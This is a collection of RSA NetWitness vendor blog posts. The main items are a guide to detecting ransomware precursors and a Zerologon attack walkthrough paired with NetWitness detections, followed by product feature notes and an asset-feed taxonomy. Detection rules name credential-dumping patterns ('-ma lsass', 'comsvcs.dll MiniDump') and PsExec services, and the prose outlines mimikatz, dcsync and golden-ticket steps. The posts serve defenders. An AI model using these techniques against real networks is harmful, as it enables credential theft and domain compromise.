Everything we have gone over can be expanded on further in some shape or form. Both Censys and Shodan have more functionality than what was discussed here. I chose these two as they are often not utilized by a blue team. Part of being an analyst is understanding the organizations infrastructure. Another part is to think outside the box and look at the infrastructure from an attacker's point of view. These two tools are often used during a reconnaissance phase of an attack. It is beneficial for a blue team to use these tools as well. Shodan is often used to find vulnerable devices but we are able to re-purpose it to make our vulnerability lookup more efficient. The Censys lookup provides us a with a quick way to see what devices may be vulnerable. The information is the same as what the attacker sees. I hope you found this post interesting and learned something new. Anything involving attacks is always a personal interest to me and I enjoy providing my customers (and you the reader) some information that I have learned over time.

 

We will be discussing this process on the December 16, 2020 webinar:

The Hunt for RCE (Packets)

Table of Contents

 

 

Introduction

Ransomware is something that’s haunted businesses for well over a decade, and now more than ever, detection for these attacks is something that should be prioritized by organizations. While reports have noted a slight decline in the number of ransomware attacks (Sophos 2020), they have now become highly targeted, more sophisticated, and deadly due to the value of the assets being encrypted.

 

How is Ransomware Deployed?

For ransomware to be as effective as possible, it must infect as many endpoints as possible, this means that ransomware is commonly deployed using techniques that allow for quick and easy distribution. Deployment methods could involve the following:

 

  • Microsoft SysInternals PsExec Utility
  • Group Policy Objects (GPOs)
  • System Center Configuration Manager (SCCM)

 

If the attacker has reached the stage where they are ready to distribute the ransomware, your detection of it will most likely occur once it starts encrypting your files, which is far too late. Prior to the deployment of the ransomware, the attacker must infiltrate the network, setup backdoors, harvest credentials, laterally move, and exfiltrate data – the attacker has to make a lot of noise to reach their end goal, and it is at these key points where defenders need to be detecting this attack. The dwell time from first signs of malicious activity to the deployment of ransomware can be as little as a few hours, so quick detection to prevent a successful attack is a must. The following figure shows an example flow of how a ransomware attack may play out:

 

 

Let's run through this and see how we can detect this with NetWitness.

 

Credential Harvesting

For an attacker to laterally move, they are going to need some credentials, these are typically obtained by dumping the memory of LSASS and using Mimikatz to extract the cleartext credentials from the dump. There are several methods an attacker can use to dump the memory of LSASS:

 

  • Microsoft Sysinternals ProcDump
  • Using the MiniDump function from comsvcs.dll
  • Custom applications (such as Dumpert)

 

Understanding these methods and how they manifest themselves in NetWitness is important for defenders, so they can quickly identify if these actions are occurring on their network.

 

ProcDump

ProcDump is a command line utility, and as such, will typically be executed via cmd.exe. The corresponding events for this would look similar to below, where cmd.exe launches the ProcDump binary with the command line arguments to dump LSASS memory and save it as a minidump:

 

We then see the ProcDump binary open lsass.exe in order to dump the memory:

 

This minidump would typically be exfiltrated from the network so the attacker can run Mimikatz against it to extract credentials. They do this activity offline as introducing Mimikatz into the network would most likely trigger antivirus and other detections. You should definitely monitor your AV logs for alerts of this type.

 

The activity above could be detected by adding the following application rule to your Endpoint Decoder(s):

NameLogic
procdump lsass dumpparam.src contains '-ma lsass' || param.dst contains '-ma lsass'
sysinternals tool usageparam.src contains '-accepteula' || param.dst contains '-accepteula'

 

Microsoft Sysinternal tools could also be detected by utilising the following query, file.vendor = 'sysinternals - www.sysinternals.com':

 

As a defender, it would then be possible to identify malicious intent by analyzing the location and names of the binaries. For example, the screenshot below shows that the Sysinternal tool named, pd.exe, exists in the C:\PerfLogs\ directory, this should stand out as anomalous and be triaged:

 

comsvcs.dll

This method has been around for quite some time but is seldom observed being utilized by attackers, however, it is a method to dump LSASS memory that should be monitored all the same. An example of how this may look is shown below, where we see a PowerShell command using rundll32.exe to utilize the MiniDump function to create minidump of LSASS:

 

We then see rundll32.exe open lsass.exe in order to dump the memory:

 

The activity above could be detected by adding the following application rule to your Endpoint Decoder(s):

NameLogic
comsvcs.dll lsass dumpparam.src contains 'comsvcs.dll MiniDump' || param.dst contains 'comsvcs.dll MiniDump'

 

Custom Applications

Custom applications can be made to dump the memory of LSASS using direct system calls and API unhooking. An example of a tool that does just that is, Dumpert. Tools such as this would commonly be executed by cmd.exe. From the below we can see that cmd.exe was used to run Outflank-Dumpert.exe, and subsequently Outflank-Dumpert.exe opens lsass.exe to dump the memory:

 

Activity from unsigned executables opening LSASS would be flagged by the meta value shown in the following figure. As a defender, all binaries flagged by this meta value should be investigated to confirm if they are legitimate or malicious:

 

If the LSASS minidump is transferred across the network via a cleartext protocol, and you have pushed the fingerprint_minidump Lua parser to your Packet Decoder(s), the following meta value would be created; which would be another great starting point for an investigation:

 

Lateral Movement

Once the attacker has credentials they can then begin to laterally move to endpoints in the network. There are a number of options an attacker has to move laterally, typically they are seen to use:

 

  • Remote Desktop Protocol (RDP)
  • Windows Management Instrumentation (WMI)
  • Server Message Block (SMB)

 

While all the above are used legitimately within an environment, it is important for defenders to understand how and where they are utilized to idenitfy anomalous usage.

 

RDP

RDP is a great way for attackers to laterally move, it provides an interactive graphical view of the endpoint they connect to and can easily blend in with normal day-to-day operations allowing it to go unnoticed by defenders. Typically, RDP logs are utilised when evidence of compromise is found. The attacker will be utilising one or more users and this information could then be utilised as a pivot point to identify lateral activity:

In order for the RDP event logs to be parsed as shown above, I added two dynamic log parser rules: Log Parser Customize: Log Parser Rules Tab 

        

The best log to monitor RDP activity is the Microsoft-Windows-TerminalServices-LocalSessionManager/Operational event log; an event ID of 21 will be a successful RDP connection. A great read to get a better handle on the event ID's related to RDP can be found here: Windows RDP-Related Event Logs: Identification, Tracking, and Investigation | Ponder The Bits.

 

WMI

Moving laterally to endpoints using WMI is a common technique adopted by attackers. Typically, usage of a tool named, WMIExec, is favoured. The following screenshot shows an example of how this tools usage looks in NetWitness Endpoint. From the below we can see the WMI provider service, WmiPrvSE.exe, executes cmd.exe and passes the parameters along with it:

 

Adding the following application rules to your Endpoint Decoder(s) would assist with detecting potentially malicious WMI usage:

NameLogic
wmiexecparam.dst contains '127.0.0.1\\admin$\\__1'

 

The NetWitness Endpoint Decoder also comes with out of the box content to detect potentially malicious WMI usage:

 

Pivoting on these meta values would be a great way to detect possible attacker lateral movement, as a defender you would want to identify any atypical commands associated with the WMIC activity, an example of this is shown below, whereby the the attacker could use WMI to remotely execute commands on an endpoint using "process call create":

 

Remote WMI activity is also flagged in NetWitness Packets with the meta value, remote wmi activity. When process call create is utilised (CAR-2016-03-002: Create Remote Process via WMIC | MITRE Cyber Analytics Repository), the execmethod meta value will be populated under the action meta key. Identifying endpoints where this is taking place and typically does not, is another great starting point to identify potentially malicious WMI usage:

 

SMB

Lateral movement via SMB is typically performed with the net use command. It allows attackers to access a shared resource on a remote computer. Their favoured resources are typically the administrative shares, which commonly are C$, ADMIN$, D$. In order to identify if this type of activity is occurring in your environment keep an eye out for the following meta values:

 

A sample of the net use command to mount an administrative share is shown below:

 

As a defender you would want to pivot on these events and see what endpoints this activity is occurring on, from there you can perform timeline analysis on the endpoint to see what other activity took place around that time.

 

 

Backdoors

Once an attacker has breached a network they will need to maintain persistence. There are two primary ways that an attacker will do this:

 

  • Deploy a web shell to a public facing server
  • Deploy a Trojan to beacon back to a C2 server

 

A common method to detect C2's is via proactive hunting, which is something we have discussed in-depth on many occasions as part of the Profiling Attacker Series. We highly recommend reading through these posts to grasp C2 and web shell detection as they have been covered in-depth on a number of posts.

 

Another great resoure for identifying endpoints that are potentially infected with web shells or Trojans is the Microsoft-Windows-Windows Defender/Operational event log. Antivirus events are often overlooked but can be a great indicator to potential compromise as shown below, where Defender identified two web shells in the C:\PerfLogs\ directory:

 

Account Creation

Attackers may choose to create an account in order to push their ransomware or to laterally move. A common way for an attacker to create an account is with the net command. If the following meta value appears, it should be investigated to confirm if the user account creation was legitimate or not:

Pivoting on this meta value would give us some context as to what user was created and how. From the below we can see that lsass.exe executed net.exe to create an account named, helpdesk - this is indicative behaviour of the EternalBlue exploit:

 

If a user was adding via the command line it would look like the following. This is not to say that this is legitimate behaviour, but demonstrates the differences as to how a normal execution of net.exe would look:

 

For both of these events, the defender should perform anlaysis on the endpoint(s) in question and perform timeline analysis to look for further anomalous behaviour.

 

Some additonal useful application rules that could be deployed to detect anomalous behaviour by LSASS:

NameLogic
lsass writes exefilename.src = 'lsass.exe' && action = 'writetoexecutable'
lsass creates processfilename.src = 'lsass.exe' && action = 'createprocess'

 

From the account creation perspective, the Security event log would record a 4720 event ID along with information about the user that was created:

 

As a defender, you could pivot on reference.id = '4720' to analyse what user accounts were being created and where.

 

Ransomware Deployment

Ransomware can be deployed via a number of methods. The one we will cover here is deployment via PsExec. This is a common choice for attackers as it is a legitimate Microsoft tool that can be easily scripted to copy and execute files. Based on the way PsExec works, we can easily spot its activity based off of the following meta value:

 

Drilling into these events, we can see that PsExec.exe was used to connect to a remote endpoint. transfer a binary and execute it:

 

A useful application rule to further detect PsExec usage could be:

NameLogic
psexec usagefilename.dst = 'psexesvc.exe'

 

There are many clones os PsExec that work in a very similar to fashion, the following application rules should be added to help identify their usage within your envrionment:

NameLogic
remcom usagefilename.dst = 'remcomsvc.exe'
csexec usagefilename.dst = 'csexecsvc.exe'
paexec usagefilename.dst begins 'paexec'

 

From a Packet perspective, PsExec execution would be flagged under the Indicators of Compromise meta key. As a defender you would then need to determine if the PsExec activity is legitimateor not:

 

For a log perspective, the System event log records an event ID of 7045 (service creation) when PsExec is being used, as is shown below:

 

This is because PsExec and similar to tools utilise the service control manager (SCM) in order to function. For a better understanding of PsExec and how it works, please refer to the following URL: https://www.contextis.com/de/blog/lateral-movement-a-deep-look-into-psexec.

 

 

Conclusion

What has been outlined above is merely an example of how a ransomware attack may unfold. Of course there are a myriad of tactics, techniques, and procedures (TTPs) an attacker will have in their arsenal that have not been outlined within this blog post, but this hopefully gives you a good starting point of how to use NetWitness to identify anomalous behaviours and prevent successful attacks. The further down you are in this process the higher the probabiity the attacker will succeed, if you are at the PsExec stage, it is already a bit too late. It should also be noted that the application rules listed in this blog may generate false positives, each envrionment is unique and the filtering as such should be performed on an individual basis.


RSA NetWitness Platform 11.5 has expanded support for Snort rules (also known as signatures) that can be imported into the network Decoders. Some of the newly supported rule parameters are:

  • nocase
  • byte-extract
  • byte-jump
  • threshold
  • depth
  • offset

This additional coverage enables administrators to use more commonly available detection rules that were not previously supported. The ability to use further Snort rules arms administrators with another mechanism, in addition to application rules and Lua parsers, to extend the detection of known threats. 

 

To expand your knowledge on what is and is not supported, along with a much more detailed initial setup guide, check out Decoder Snort Detection 

 

Once configured, to Investigate the threats that Snort rules have triggered, examine the Events pivoting in the metadata (sig.id, sig.name) populated from the rules themselves or query for threat.source = "snort rule" to find all Snort events. The Signature Identifier (sig.id) corresponds to the sid attribute in the Snort rule while the Signature Name (sig.name) corresponds to the msg attribute of the rule options.

Snort rules found

As always, we welcome your feedback!

 

Please leave any feedback or suggestion on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit you own.

Zerologon (CVE-2020-1472) is a vulnerability with a perfect CVSS score of 10/10 being used in the wild by attackers, allowing them to gain admin access to a Windows Domain Controller.

 As more public exploits for this vulnerability are being published, including its support within mimikatz which is widely used, it’s expected to see even more attacks leveraging this vulnerability, and it's therefore crucial to be able to detect such attempts.

 

In this post we will see how this vulnerability can be exploited using mimikatz to gain administrative access to a Windows Domain Controller running on Windows Server 2019, and how the different stages of the attack can be identified by the RSA NetWitness Platform, leveraging Logs, Network and Endpoint data. This will include exploiting the Zerologon vulnerability, followed by the creation of golden tickets, and finally gaining admin access to the domain controller via a pass-the-hash attack/

  

We will assume that the attacker already has an initial foothold on one of the internal workstations, and now wants to move laterally to the domain controller.

 

 

Step 1

Attacker

The attacker downloads “mimikatz” on the compromised system using the “bitsadmin” command.

 

 

RSA NetWitness Endpoint

The executed command is detected by RSA NetWitness Endpoint and tagged as remote file copy using BITS. The exact target parameters are also provided, allowing to see from where the file was downloaded (identifying the attacker’s server) as well as the location of the downloaded file. In addition, mimikatz being a known malicious file, we are able to tag the event accordingly.

 

 

 

RSA NetWitness Network

And the resulted network session is captured by RSA NetWitness Network, identifying the client application as Microsoft BITS as well as the downloaded file (mimikatz.exe). If needed, the session can be reconstructed to extract the file for further forensics.

 

 

 

 

 

Step 2

Attacker

The attacker launches mimikatz, and tests whether the domain controller is vulnerable to the Zerologon vulnerability.

 

As the domain controller is vulnerable, the attacker executes the exploit.

 

 

RSA NetWitness Network

We know that the exploit starts with a “NetrServerReqChallenge” and spoofs the “NetrServerAuthenticate” with 8x ‘0’s (as seen in the previous screenshot). We also know that it takes an average of 256 of such attempts for the attack to be successful.

This consequently leads to the following:

  • We expect to see “NetrServerReqChallenge” and “NetrServerAuthenticate”
  • Due to the large number of attempts, we expect the size of the session to be larger than other similar connections
  • The session to contain lots of 0's

 

 In fact, by looking at the captured network session, we can see these indicators tagged by RSA NetWitness.

 

As seen in the above screenshot

  • The session is related to netlogon (as the vulnerability targets this service)
  • We can see both “NetrServerReqChallenge” and “NetrServrAuthenticate” within the session
  • The most common byte (MCB.REQ) is “0”
  • The size of the payload is around 200KB
  • As we also have the RSA NetWitness Endpoint agent installed on the workstation, we can link the captured network session to the process that generated this connection, in this case “mimikatz.exe”

 

Using this information, the use of this exploit could be identified with the follow Application Rule:

service=135 && filename='netlogon' && action begins 'NetrServerAuthenticate' && action='NetrServerReqChallenge' && mcb.req=0 && size>40000

 

 

RSA NetWitness Logs

A successful attack would lead to the domain controller’s password being changed. This can be identified within the Windows Logs based on the following criteria:

  • Event ID: 4742 (A computer account was changed)
  • Source User: Anonymous logon
  • Destination User: ends with “$” sign
  • Hostname: specify your domain controllers

 

 

 

The following Application Rule / Query could be used for this detection:

device.type='windows' && reference.id='4742' && user.dst ends '$' && user.src='anonymous logon'

 

 

 

 

 

Step 3

Attacker

Once the attacker successfully exploits the domain controller, he now has access to it with replication rights. He can now use the “dcsync” feature of mimikatz to mimic the behavior of a domain controller and request the replication of specific users to get their password hashes. This can be done to get the password hash of the Administrator account as seen in the below screenshot.

 

 

 

RSA NetWitness Network

User Replication is requested using the “GetNCChanges” function, which would result in the domain controller providing the account hashes. This behavior can be seen based on the captured network traffic.

 

 

This behavior should me monitored and alerted on when initiated from an IP or subnet not expected to perform domain replication.

 

The following is a rule that can identify this behavior, it should be fine-tuned to exclude IP addresses that are expected to have this behavior:

 

action = ‘drsgetncchanges’ && ip.src != <include list of approved IP addresses>

 

 

RSA NetWitness Logs

This would also generate Windows Logs with the event ID 4662, but by default this log doesn’t provide enough granularity to avoid having too many false positives and is therefore not recommended to be used on its own as a detection mechanism.

 

 

 

 

 

Step 4

Attacker

The attacker then gets a golden ticket with a validity of 10 years for the Administrator account.

 

He is then able to use the ticket in a pass-the-hash attack.

 

He is now able to get shell access to the domain controller without the need for authentication and executes couple of commands to confirm he is connected to the Domain Controller (hostname, whoami ...).

 

 

 

RSA NetWitness Logs

The attacker gained shell access by using PsExec. This leads to the creation of a service named “psexesvc” on the domain controller that can be detected with Windows Logs and is tagged as a pass-the-hash attack by RSA NetWitness as seen below.

 

 

RSA NetWitness Network

Leveraging network data can uncover more details.

As seen in the below screenshot, we can identify:

  • The use of the “Administrator” account to login over SMB
  • The use of Windows admin shares
  • The transfer of an executable within one of the sessions (psexe)
  • The creation of a service (psexesvc)

 

 

 

RSA NetWitness Endpoint

The initial execution of “cmd.exe” by PsExec on the Domain Controller to gain the shell access can easily be identified by RSA NetWitness Endpoint.

 

Any other command executed by the attacker after he gets shell access would also be identified and logged by RSA NetWitness Endpoint, with the ability to track which commands have been executed, and by which processes they have been launched, providing a full picture of how and what the attacker is doing on the domain controller.

 

 

 

Conclusion

When dealing with such attacks and breaches, which often blend in within normal noise and behaviors, it becomes evident that the need for a rich data set based on a combination of Logs, Network and Endpoint is critical to both detect the breach as well as to identify the full scope of the breach from start to end, for each step done by the attacker.

Having visibility over East/West network traffic with rich metadata has also brought lots of value when compared to just relying on logs to detect and investigate more efficiently this attack. With the release of the RSA NetWitness Platform v11.5 it is now possible to setup policies to define for which network traffic to keep/drop the full payload in addition to the meta data, allowing to do east/west network capture in a more efficient way.

RSA NetWitness has been supporting Structured Threat Information eXpression (STIX™) as it has been the industry standard for Open Source Cyber Threat Intelligence for quite some time. 

 

 

In NetWitness v11.5 we take the power of Threat Intelligence coming from STIX to the next level. When in Investigate or Respond views, you will now see context of the Intel delivered by STIX right there next to the meta like this:

 

For this - NetWitness Platform’s has enhanced the existing integration with STIX to improve the threat detection capabilities with improved Threat Intel information to detect and respond to attacks in a timely manner. Now, when an analyst investigates threat intelligence information retrieved from a STIX data source, the context for each indicator is displayed. The context information includes viewing the adversary and the attack details directly from Context Hub, in both Investigate and Respond views.

 

Note that for the analyst to use this capability, an administrator needs to configure the STIX data sources to retrieve the threat intelligence data from the specified STIX source as below.

 

 

  1. Add & Configure STIX/TAXII as a 'Data Source' (note that you can add TAXII server/REST server/STIX file): 
  2. Create Feeds: Setup STIX feed from Custom Feeds section. Note that you can now see all the existing STIX Data Sources (as added in pervious step) to create feeds out of them. See Decoder: Create a STIX Custom Feed  for more details.
  3. Context Lookup Summary
  4. Context Lookup Details:

Here are the links to detailed documentation around STIX: 

 

Check it out and let us know what you think!

 

We strongly believe in the power of feedback! And thus please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

As of RSA NetWitness 11.5, configuring what network traffic your Decoders collect and to what degree it should collect it has become much easier. Administrators can now define a collection policy containing rules for many network protocols and choose whether to collect only metadata, collect all data (metadata and packets), or drop all data.

 

NW 11.5 Selective Collection Policy Creation

 

This is made simpler by out-of-the-box (OOTB) policies that cover most typical situations. These can also be cloned and turned into a custom policy that fits your environment best. 

 

NW 11.5 Initial Selective Collection Policies

 

The policies are managed out of a new central location that has the ability to publish these policies to multiple network Decoders at once. This allows an administrator to configure one collection policy for DMZ traffic and distribute that to all the DMZ Decoders while simultaneously using a separate policy for egress traffic and distribute that to all the egress Decoders.

 

NW 11.5 Selective Collection Policy Status

 

An administrator can view which policies are published, the Decoders they have been applied to, when the last update was made and by whom. The policies can also be created in draft form (unpublished) and not distributed to Decoders until a maintenance window is available.

 

Initially this capability focuses on network collection, but long-term plan is to continue adding types of configurations and content to be administered using this centralized management approach. Please reference the RSA NetWitness Platform 11.5 documentation for further details at Decoder: (Optional) Configure Selective Network Data Collection 

 

As always, we welcome your feedback!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

RSA NetWitness 11.5 introduces the ability to interactively filter events using the metadata associated with all the events. This is seen as a new Filter button inside the Event screen that opens the Filter Events panel.

 

NW 11.5 Event Filter Button

 

This new capability functions in two modes.

 

NW 11.5 Event Filter Panel

 

The first presents a familiar search experience for analysts of all skill levels as many websites have a similar layout where filters (attributes or categories of the data) exist on the left side of the page and the matching results display on the right side. As an example in the below image, clicking the metadata (#1) in this integrated panel automatically builds the query (#2) and retrieves the resulting table (#3) of matching events.

 

NW 11.5 Event Filter Interactive Workflow

 

As analysts use this, it helps build the relationship between the metadata associated with the events and how to use those to structure a query.

 

NW 11.5 Full Screen Filter Events Panel

 

The second mode allows the panel to extend full screen giving more real-estate to show more metadata at once. This mode may seem very familiar to those who have used Navigate previously. As meta data values are clicked they are added as filters to the query bar and updates a new filter list based on the events filtered out. What it does not do is execute the query to retrieve the resulting table of events. This allows the analyst to hunt through the data and then when ready to see the results they can minimize (highlighted in above image) the Filter Events panel to reveal the results.

 

In both modes, the meta values associated to the meta keys can be organized by event count or event size and sorted by the count or value. This allows for analysts to sort descending by event count to find outliers, a small limited number of communications, for example. The meta keys can also be shown in smaller meta groups to help analysts focus in on the most specific values for certain use cases. Analysts can use the query profiles to execute a query with a predefined query, meta group, and column group allowing them to jump right into a specific subset of data. The right click actions that provide additional query and lookup options are also available. To get a further deep dive into the capability check out the Investigate documentation Investigate: Drill into Metadata in the Events View (Beta)  

 

As always, we welcome your feedback!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

A business what?  A Business Context Feed is a feed that provides context about systems or data that is present in NetWitness to aid the analyst in understanding more about the system or data they are examining.  The Business Context Feed should answer some basic questions that always come up during the analysis.

What is this system? - Web Server, Domain Controller, Proxy Server, etc...

What does it do? - Authentication, Database/Application Server, Customer Portal, etc...

Would it be considered a Critical Asset?

A classic scenario would be for an IP address.  If an analyst would like to know if the IP address of interest is a Domain Controller, they would need to obtain or identify all of the IP addresses of the Domain Controllers.  Then a query must be constructed to determine if there is a match (ip.all= 10.1.22.36,10.1.22.37.14,10.16.4.3,10.8.48.89,... you get the idea).  If there is any content such as reports or alerts that are developed for this use case the list of IP addresses would need to be in all of those as well.  It can get complicated real quick once you start putting this list of IP's in content, especially when the addresses change periodically.  Creating a Business Context Feed will simplify this use case by maintaining a single feed that is centrally managed. Updating the feed can even be automated in most cases.  When the feed is applied to this use case the query gets simplified from (ip.all= 10.1.22.36,10.1.22.37.14,10.16.4.3,10.8.48.89,... you get the idea) to a query using a custom metakey hnl.asset.role='domain controller'.  Now, it is not uncommon for an organization to create around a dozen custom metakeys in NetWitness for their own use to provide additional context for data that is collected in NetWitness.  But not everyone takes the time to create a taxonomy document to set the standard on how the custom content will be defined and populated to provide consistency for other content that will be developed around it.  Frankly, it is not advised to comingle custom meta values with the meta values that are created by NetWitness natively.  This can create confusion on what the values "are" versus what they "should be", and can adversely affect other content that uses these standard keys. There are reserved metakeys that custom values do not belong, these can be identified in the Unified Data Model (UDM) as "Reserved" in the "Meta Class" column or in the "Notes" column (use "ctrl+f" in the browser).  When creating custom content it is important to set standards on how the content is created, this includes naming conventions, spelling, formatting and values. This practice provides the necessary consistency for stable content development and performance.  Another common issue is the custom content becomes knowledge exclusive to the author and can affect the time it takes to bring new people up to speed. Another factor is time, as the undocumented knowledge becomes stale to the author and often cannot recall the logic behind the naming, purpose, or value. The taxonomy document takes the burden off of the content author and provides a reference for all parties involved in creating, updating and consuming the content.  Below is an example use case of the taxonomy to create custom metakeys and content to identify critical assets.

 

Creating Custom Metakeys - Things to Know

Name Length

You are limited to 16 characters (including the "." dot delimiter)  - use lowercase only for the name and values.

 

Allowed Characters

Only alpha numeric values are allowed, except for the "." delimiter.

 

Name Construction

Metakey names should follow the Unified Data Model (UDM) "3 Logical Parts" and should not conflict with any current RSA keys.


Metakey concept image

Value Format

You must decide what your metakey value it will store and define it in the appropriate custom index files if needed. The most commonly used formats are "Text" and "Integer". There are other formats but these are the most commonly used.

 

Multivalued Field

You will have to properly identify whether or not your metakey may contain multiple values in the same session.  This is done in the index file with a singleton="true" in the concentrator custom index files.  The reason for this is to have the ESA properly identify the field as a multivalued field (array) or a single valued field automatically.  

 

Example Use Case:  Creating Critical Asset Metakeys

Concept

The concept is the least specific part of the metakey name, typically used to group the metakeys, or in this case clearly identify the custom metakeys from the standard metakeys.  The concept for these asset metakeys will be an abbreviation of my "Homenet Lab", it is not uncommon to use an abbreviated company name here.  I will use "hnl" in this case.

 

Context

The context is more specific and will typically define the "classification" of the key.  A context name of "asset" will be used here as these keys are for identifying the critical assets

 

Sub-Context 

The sub-context is the most specific, the specific sub-context values are shown below:

Description

Sub Context Abbreviation
Criticalitycrit
Categorycat
Rolerole
Hostnamehost
Datedate
Locationloc

 

General Description of the Metakeys

The table below contains the metakey names fully assembled with the "concept.context.sub-context" values applied, showing a general description of the custom metakeys.

Metakey NameDescription
hnl.asset.critNumeric "Criticality" rating of the asset.
hnl.asset.cat"Category" of the asset
hnl.asset.role"Role" of the asset
hnl.asset.host"Hostname" of the asset
hnl.asset.date"Date" the asset was added to the feed
hnl.asset.loc"Location" of the asset

 

Metakey Value Format

Define whether this metakey value will be text or an integer.

MetakeyValue FormatStore Multiple Values
hnl.asset.critUInt8No
hnl.asset.catTextYes
hnl.asset.role

Text

Yes

hnl.asset.hostText

No

hnl.asset.dateUInt32No
hnl.asset.locTextNo

 

Metakey Values

hnl.asset.crit

This metakey identifies the criticality of the system.  The table below lists the possible values and describes the values to use in the metakey.

Metakey Value

Description

1Extremely Critical
2Highly Critical
3

Moderately Critical

4Low


hnl.asset.cat

This metakey identifies the category of the system.  The table below lists the possible values and describes the values to use in this metakey.  Note the values are always lowercase.

Metakey Value

Description

authenticationSystems that provide authentication services, like domain controllers, LDAP servers, RADIUS, SecurID, TACACS, etc.
firewallSystems that provide firewall services.
scanner

Systems that perform scanning activities like a port/vulnerability scanner or pen test

networkNetwork Infrastructure

 

hnl.asset.role

This metakey identifies the role of the system.  The table below lists the possible values grouped by category along with the descriptions of the values to use in this metakey.  Note the values are always lowercase.

Category

Description

Value

authenticationMicrosoft Active Directorydomain controller
authenticationRADIUS Serverradius server
authenticationSecurID Serversecurid server
firewallFirewall operating in the ecommerce DMZecommerce dmz
firewallInternal firewall for secure hostingsecure hosting
firewallInternet Perimeter Firewallinternet perimeter
scannerVulnerability Scannervulnerability
scannerPenetration testingpentest
networkCore network router

core router

networkCore network switchcore switch

 

hnl.asset.host

This metakey has the short hostname in lowercase

 

hnl.asset.date

This metakey contains the numeric date the system was added to the feed in YYYYMMDD format.  The date is used to determine the age of the entry and to also know that prior to this date there is no contextual meta generated.

 

hnl.asset.loc

This metakey identifies the location of the system. The table below lists the possible values and describes the values to use in this metakey. Note the values are always lowercase.

Metakey Value

Description

hqdc-01Headquarters Data Center 1
lvdc-02Leonardville Data Center 2
mscwdc-03

Moscow Data Center 3

raddc-04Radium Data Center 4

 

Sample Business Context Feed Using Taxonomy

User Friendly Version:

#indexhnl.asset.crithnl.asset.cathnl.asset.rolehnl.asset.hosthnl.asset.datehnl.asset.loc
10.0.0.11firewallperimeterhnlhqfw-0120200708hqdc-01
192.168.1.11firewallsecure hostinghnlshfw-0220200708hqdc-01
192.168.63.1001authenticationdomain controllerhnraddc-0120200708raddc-04
192.168.1.871authenticationdomain controllerhnlvdc-0220200708lvdc-02
192.168.50.1001authenticationdomain controllerhnmscwdc-0320200708mscwdc-03
10.0.0.161networkcore switchhnlcsw-0120200708hqdc-01

 

CSV File format for Feed Consumption:

#index,hnl.asset.crit,hnl.asset.cat,hnl.asset.role,hnl.asset.host,hnl.asset.date,hnl.asset.loc
10.0.0.1,1,firewall,perimeter,hnlhqfw-01,20200708,hqdc-01
192.168.1.1,1,firewall,secure hosting,hnlshfw-02,20200708,hqdc-01
192.168.63.100,1,authentication,domain controller,hnraddc-01,20200708,raddc-04
192.168.1.87,1,authentication,domain controller,hnlvdc-02,20200708,lvdc-02
192.168.50.100,1,authentication,domain controller,hnmscwdc-03,20200708,mscwdc-03
10.0.0.16,1,network,core switch,hnlcsw-01,20200708,hqdc-01

 

Customizing Index

Now that the metakey names and values have been established they can be added to the necessary index custom files so that they are available to the analyst in Investigate.

 

Log/Network Decoders

There are two metakeys that are defined as integers, so we need to tell the Log or Network Decoder that these metakeys are to be formatted as integers.

The following custom index files need to be modified with the entries below:

index-logdecoder-custom.xml (Log Decoder)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet Lab Custom metakeys *** -->
<key description="HNL Asset Criticality" name="hnl.asset.crit" format="UInt8" level="IndexNone"/>
<key description="HNL Asset Date" name="hnl.asset.date" format="UInt32" level="IndexNone"/>

index-decoder-custom.xml (Network Decoder)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet Lab Custom metakeys *** -->
<key description="HNL Asset Criticality" name="hnl.asset.crit" singleton="true" format="UInt8" level="IndexNone"/>
<key description="HNL Asset Date" name="hnl.asset.date" singleton="true" format="UInt32" level="IndexNone"/>

Concentrators

All of the custom meta keys will need to be added to the Concentrator to be available in Investigate for the Analysts.

The following custom index file need to be modified with the entries below.

index-concentrator-custom.xml (Concentrator)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet custom index keys added to provide additional information from feeds *** -->

<key description="HNL Asset Criticality" name="hnl.asset.crit" singleton="true" format="UInt8" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Category" name="hnl.asset.cat" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Role" name="hnl.asset.role" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Hostname" name="hnl.asset.host" singleton="true" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Date Added" name="hnl.asset.date" singleton="true" format="UInt32" level="IndexValues" valueMax="100"/>
<key description="HNL Asset Location" name="hnl.asset.loc" singleton="true" format="Text" level="IndexValues" valueMax="50"/>

 

Now you have more information than just an IP address to look at thanks to the Taxonomy and a Business Context Feed.

 

As of RSA Netwitness Platform 11.5, analysts have a new landing page option to help them determine where to start upon login.  We call this new landing page Springboard.  In 11.5 it will become the new default starting page upon login (adjustable) and can be accessed from any screen simply by click the RSA logo on the top left. 

 

The Springboard is a specialized dashboard (independent of the existing "Dashboard" functionality) designed as a starting place where analysts can quickly see the variety of risks, threats, and most important events in their environment.  From the Springboard, analysts can drill into any of the leads presented in each panel and be taken directly to the appropriate product screen with the relevant filter pre-applied, saving time and streamlining the analysis process.  

 

As part of the 11.5 release, Springboard comes with five pre-configured (adjustable) panels that will be populated with the "Top 25" results in each category, depending on the components and data available:

 

Top Incidents - Sorted by descending priority.  Requires the use of the Respond module.

Top Alerts -  Sorted by descending severity, whether or not they are part of an Incident. Requires the use of the Respond module.

Top Risky Hosts -  Sorted by descending risk score.  Requires RSA NetWitness Endpoint.

Top Risky Users - Sorted by descending risk score.  Requires RSA UEBA.
Top Risky Files - Sorted by descending risk score. Requires RSA NetWitness Endpoint.

 

